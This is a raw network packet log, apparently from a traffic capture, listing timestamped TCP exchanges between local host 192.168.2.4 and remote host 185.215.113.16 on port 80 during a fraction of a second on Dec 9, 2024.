Dec 9, 2024 08:08:33.191673994 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.191701889 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.191737890 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.193377972 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.193512917 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.193564892 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.195069075 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.195116997 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.195168018 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.195202112 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.196747065 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.196827888 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.196867943 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.198389053 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.198425055 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.198474884 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.198515892 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.200058937 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.200110912 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.200144053 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.200931072 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.201711893 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.201750994 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.201828003 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.201870918 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.203377008 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.203423023 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.203517914 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.203557968 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.205127954 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.205256939 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.205331087 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.205390930 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.206804991 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.206849098 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.206902027 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.206943035 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.208123922 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.208182096 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.208215952 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.208288908 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.209693909 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.209743977 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.209774971 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.209815025 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.211247921 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.211287975 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.211335897 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.211380959 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.212893963 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.212966919 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.213084936 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.213203907 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.214317083 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.214361906 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.214462042 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.214530945 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.215850115 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.215868950 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.215892076 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.215907097 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.217427969 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.217467070 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.217478037 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.217509031 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.218858957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.218900919 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.218966961 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.219007015 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.220339060 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.220462084 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.220462084 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.220539093 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.221833944 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.221950054 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.221951962 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.221987963 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.223290920 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.223328114 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.223397970 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.223439932 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.224761963 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.224792957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.224812031 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.224827051 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.226241112 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.226305962 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.226361036 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.226402998 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.227694035 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.227732897 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.227735996 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.227777958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.229151964 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.229242086 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.229285955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.230526924 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.230571032 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.230623007 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.230664015 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.231961966 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.232007980 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.232084036 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.232302904 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.234055042 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.234097958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.234321117 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.234359980 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.235363007 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.235413074 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.235438108 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.235521078 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.236202002 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.236242056 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.236288071 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.236324072 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.237586975 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.237623930 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.237705946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.237746954 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.238987923 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.239033937 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.239082098 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.239119053 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.240336895 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.240458965 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.240499020 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.241190910 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.241231918 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.241262913 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.241302013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.242043018 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.242113113 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.242116928 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.242153883 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.242867947 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.242913008 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.242985010 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.243124962 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.243716002 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.243762016 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.243913889 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.243956089 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.244550943 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.244673967 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.244719028 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.245456934 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.245496988 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.245553970 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.245631933 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.246228933 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.246295929 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.246298075 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.246334076 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.247096062 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.247181892 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.247221947 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.247909069 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.247951984 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.247952938 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.247993946 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.248775005 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.248831034 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.248855114 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.248888969 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.249604940 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.249658108 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.249677896 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.249716043 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.250437975 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.250533104 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.250550032 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.250588894 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.251262903 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.251388073 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.251398087 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.251432896 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.252120018 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.252167940 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.252192974 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.252242088 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.252984047 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.253042936 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.253158092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.253196001 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.253777981 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.253927946 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.375808001 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.375858068 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.375921011 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.376012087 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.376188040 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.376230001 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.376239061 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.376277924 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.377031088 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.377073050 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.377104998 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.377146006 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.377870083 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.377922058 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.377949953 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.377962112 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.378681898 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.378739119 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.378799915 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.378844023 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.379498959 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.379556894 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.379582882 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.379621029 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.380384922 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.380431890 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.380547047 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.380760908 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.381198883 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.381249905 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.381278992 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.381366968 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.382030964 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.382091045 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.382167101 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.382211924 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.382850885 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.382911921 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.382970095 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.383116961 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.383692026 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.383735895 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.383786917 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.383825064 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.384552956 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.384593964 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.384839058 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.384885073 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.385375023 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.385497093 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.385509968 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.385529995 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.386178017 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.386223078 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.386253119 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.386296034 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.387069941 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.387105942 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.387217999 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.387259960 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.387876034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.387991905 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.388036013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.388761997 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.388804913 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.388884068 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.388927937 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.389575005 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.389616013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.389667034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.389709949 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.390449047 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.390582085 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.390619040 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.391297102 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.391350031 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.391406059 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.391448021 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.392189026 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.392239094 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.392283916 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.392342091 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.393004894 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.393049955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.393105030 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.393146038 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.393774986 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.393812895 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.393978119 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.394073009 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.394612074 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.394762993 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.394804955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.395462990 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.395504951 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.395538092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.395576954 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.396301985 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.396343946 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.396409035 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.396528006 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.397139072 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.397192955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.397238970 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.397279024 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.397955894 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.398001909 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.398065090 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.398114920 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.398797035 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.398840904 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.398950100 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.398991108 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.399650097 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.399691105 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.399729013 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.399947882 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.400501966 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.400543928 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.400577068 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.400616884 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.401289940 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.401405096 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.401428938 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.401458979 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.402159929 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.402312040 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.402534962 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.403103113 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.403171062 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.403286934 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.403836966 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.403886080 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.403953075 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.403994083 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.404656887 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.404705048 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.404840946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.404896975 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.405529022 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.405576944 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.405597925 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.405658960 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.406356096 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.406402111 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.406450987 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.406493902 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.407207966 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.407260895 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.407303095 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.407342911 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.408058882 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.408183098 CET	80	49829	185.215.113.16	192.168.2.4
